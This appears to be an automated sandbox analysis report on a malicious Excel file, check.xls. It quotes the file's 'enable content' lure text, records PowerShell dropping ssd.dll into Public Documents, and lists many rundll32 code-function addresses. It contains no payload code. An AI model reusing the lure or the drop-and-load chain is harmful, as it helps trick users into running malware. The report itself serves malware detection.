Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 Previewing is not available for protected documents. 15 16
Source: Screenshot number: 4 Screenshot OCR: protected documents. 15 16 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 24 25 26 27 28 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 , . Previewing is not available for protected documents. Yo
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press"4NABLE ED T NG" and "ENABLE CONTENT" buttons to prev ew th
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to prev ew th s document 17 18 19 20 21 22 23 G) I I 24 25 26 27
Source: check.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Source: check.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Documents\ssd.dll Jump to dropped file
Source: check.xls Initial sample: EXEC
Source: check.xls Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7E991 9_2_01F7E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7F8FD 9_2_01F7F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7AB87 9_2_01F7AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F781B7 9_2_01F781B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F751BB 9_2_01F751BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F84116 9_2_01F84116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F820BA 9_2_01F820BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F770B3 9_2_01F770B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7F09B 9_2_01F7F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8907F 9_2_01F8907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F72051 9_2_01F72051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F90056 9_2_01F90056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F79011 9_2_01F79011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F80001 9_2_01F80001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F913AD 9_2_01F913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8C3A0 9_2_01F8C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8E395 9_2_01F8E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8D389 9_2_01F8D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F75361 9_2_01F75361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F74346 9_2_01F74346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8A2E8 9_2_01F8A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7B2C7 9_2_01F7B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7E2CC 9_2_01F7E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F72251 9_2_01F72251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F895FA 9_2_01F895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7E5CF 9_2_01F7E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7A55F 9_2_01F7A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F82550 9_2_01F82550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F75548 9_2_01F75548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F88519 9_2_01F88519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F764E2 9_2_01F764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8044F 9_2_01F8044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8F435 9_2_01F8F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8176B 9_2_01F8176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7B74D 9_2_01F7B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F77735 9_2_01F77735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8473C 9_2_01F8473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F79714 9_2_01F79714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7D6D8 9_2_01F7D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F866CA 9_2_01F866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8A666 9_2_01F8A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8C631 9_2_01F8C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F88606 9_2_01F88606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F759F2 9_2_01F759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F909B5 9_2_01F909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F78969 9_2_01F78969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8894B 9_2_01F8894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F81889 9_2_01F81889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F74816 9_2_01F74816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8DBEA 9_2_01F8DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F88BE3 9_2_01F88BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F72BD9 9_2_01F72BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F89BCF 9_2_01F89BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F87BA6 9_2_01F87BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F79B83 9_2_01F79B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F84B87 9_2_01F84B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7BB7E 9_2_01F7BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8CB5B 9_2_01F8CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F78B3D 9_2_01F78B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8BB23 9_2_01F8BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F80B19 9_2_01F80B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7EA99 9_2_01F7EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F71A56 9_2_01F71A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8AA30 9_2_01F8AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F86DF8 9_2_01F86DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F87DD5 9_2_01F87DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F79DCF 9_2_01F79DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F76D24 9_2_01F76D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8DCF7 9_2_01F8DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F85CC4 9_2_01F85CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F74C5D 9_2_01F74C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F86C49 9_2_01F86C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F77C37 9_2_01F77C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8AC3A 9_2_01F8AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F73C3C 9_2_01F73C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F90C14 9_2_01F90C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7DFF3 9_2_01F7DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F77FF2 9_2_01F77FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7CF47 9_2_01F7CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F90F33 9_2_01F90F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7AEFB 9_2_01F7AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F89EEC 9_2_01F89EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F74EE3 9_2_01F74EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8DEDC 9_2_01F8DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F7EE81 9_2_01F7EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8AE6D 9_2_01F8AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F75E60 9_2_01F75E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F80E53 9_2_01F80E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F90E3A 9_2_01F90E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F73E3F 9_2_01F73E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F8BE27 9_2_01F8BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C044F 10_2_007C044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B3C3C 10_2_007B3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B9011 10_2_007B9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BF8FD 10_2_007BF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BD6D8 10_2_007BD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C20BA 10_2_007C20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C4116 10_2_007C4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C95FA 10_2_007C95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B7FF2 10_2_007B7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B59F2 10_2_007B59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007D13AD 10_2_007D13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BAB87 10_2_007BAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C907F 10_2_007C907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CAE6D 10_2_007CAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CA666 10_2_007CA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B5E60 10_2_007B5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B4C5D 10_2_007B4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B2051 10_2_007B2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B2251 10_2_007B2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007D0056 10_2_007D0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B1A56 10_2_007B1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C0E53 10_2_007C0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C6C49 10_2_007C6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B3E3F 10_2_007B3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CAC3A 10_2_007CAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007D0E3A 10_2_007D0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CF435 10_2_007CF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CAA30 10_2_007CAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B7C37 10_2_007B7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CC631 10_2_007CC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CBE27 10_2_007CBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007D0C14 10_2_007D0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B4816 10_2_007B4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C8606 10_2_007C8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C0001 10_2_007C0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BAEFB 10_2_007BAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CDCF7 10_2_007CDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C9EEC 10_2_007C9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CA2E8 10_2_007CA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B4EE3 10_2_007B4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B64E2 10_2_007B64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CDEDC 10_2_007CDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C66CA 10_2_007C66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BE2CC 10_2_007BE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C5CC4 10_2_007C5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BB2C7 10_2_007BB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B70B3 10_2_007B70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BF09B 10_2_007BF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BEA99 10_2_007BEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C1889 10_2_007C1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BEE81 10_2_007BEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BBB7E 10_2_007BBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B8969 10_2_007B8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C176B 10_2_007C176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B5361 10_2_007B5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BA55F 10_2_007BA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CCB5B 10_2_007CCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C2550 10_2_007C2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B5548 10_2_007B5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BB74D 10_2_007BB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C894B 10_2_007C894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BCF47 10_2_007BCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B4346 10_2_007B4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C473C 10_2_007C473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B8B3D 10_2_007B8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B7735 10_2_007B7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007D0F33 10_2_007D0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B6D24 10_2_007B6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CBB23 10_2_007CBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C8519 10_2_007C8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C0B19 10_2_007C0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B9714 10_2_007B9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C6DF8 10_2_007C6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BDFF3 10_2_007BDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CDBEA 10_2_007CDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C8BE3 10_2_007C8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B2BD9 10_2_007B2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C7DD5 10_2_007C7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C9BCF 10_2_007C9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B9DCF 10_2_007B9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BE5CF 10_2_007BE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B51BB 10_2_007B51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007D09B5 10_2_007D09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B81B7 10_2_007B81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C7BA6 10_2_007C7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CC3A0 10_2_007CC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CE395 10_2_007CE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007BE991 10_2_007BE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007CD389 10_2_007CD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007B9B83 10_2_007B9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C4B87 10_2_007C4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081F8FD 11_2_0081F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081E991 11_2_0081E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081AB87 11_2_0081AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081F09B 11_2_0081F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008170B3 11_2_008170B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008220BA 11_2_008220BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00820001 11_2_00820001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00819011 11_2_00819011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00812051 11_2_00812051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00830056 11_2_00830056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082907F 11_2_0082907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008181B7 11_2_008181B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008151BB 11_2_008151BB
